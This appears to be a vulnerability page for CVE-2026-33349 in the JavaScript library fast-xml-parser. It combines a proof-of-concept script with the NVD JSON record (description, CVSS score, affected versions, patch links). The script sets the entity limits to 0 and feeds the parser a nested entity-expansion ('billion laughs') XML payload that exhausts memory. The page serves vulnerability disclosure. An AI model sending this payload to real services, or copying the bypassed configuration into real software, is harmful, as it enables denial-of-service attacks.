CVE-2026-33349

const { XMLParser } = require('fast-xml-parser'); // Vulnerable configuration: setting limits to 0 to restrict entities const options = { ignoreAttributes: false, allowBooleanAttributes: true, // Setting these to 0 intends to disable entities, but bypasses the check maxEntitySize: 0, maxEntityCount: 0 }; const parser = new XMLParser(options); const xmlData = ` <!DOCTYPE data [ <!ENTITY a "1234567890"> <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"> <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"> <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;"> <!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;"> <!ENTITY f "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;"> <!ENTITY g "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;"> <!ENTITY h "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;"> <!ENTITY i "&h;&h;&h;&h;&h;&h;&h;&h;&h;&h;"> ]> <data>&i;</data> `; try { // This will cause DoS due to unbounded expansion because limits are bypassed const result = parser.parse(xmlData); console.log('Parsing succeeded (unexpectedly):', result); } catch (e) { console.error('Parsing failed:', e.message); }

{"cve": {"id": "CVE-2026-33349", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.407", "lastModified": "2026-03-26T13:01:52.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7."}, {"lang": "es", "value": "fast-xml-parser permite a los usuarios procesar XML desde un objeto JS sin bibliotecas basadas en C/C++ o callbacks. Desde la versión 4.0.0-beta.3 hasta antes de la versión 5.5.7, el DocTypeReader en fast-xml-parser utiliza comprobaciones de veracidad (truthy checks) de JavaScript para evaluar los límites de configuración maxEntityCount y maxEntitySize. Cuando un desarrollador establece explícitamente cualquiera de los límites en 0 —con la intención de no permitir ninguna entidad o restringir el tamaño de la entidad a cero bytes— la naturaleza 'falsy' de 0 en JavaScript hace que las condiciones de guardia se cortocircuiten, omitiendo completamente los límites. Un atacante que pueda proporcionar entrada XML a dicha aplicación puede desencadenar una expansión de entidad ilimitada, lo que lleva al agotamiento de la memoria y a la denegación de servicio. Este problema ha sido parcheado en la versión 5.5.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.1", "versionEndExcluding": "4.5.5", "matchCriteriaId": "A781B124-CD04-4153-A726-B3A19A51DA7D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.5.7", "matchCriteriaId": "E6A6A49B-279E-44B2-9936-F04662193F43"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "2398B145-2ED8-4197-8838-FAE7AD7666E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "44B6C4BE-69F4-4651-80EE-055D1F99F7EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "4B32E8C4-15A7-466D-98A7-9EDD6B45F883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "23CDA792-75FA-48A7-8577-4266A0BFB3A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "D4B7FD7D-0059-4D5B-898D-539AB43AA24A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "42844DDE-AD5B-4684-8104-1C2D133C6098"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "C045B7F2-16A9-47C9-B08D-71847A940B93"}]}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}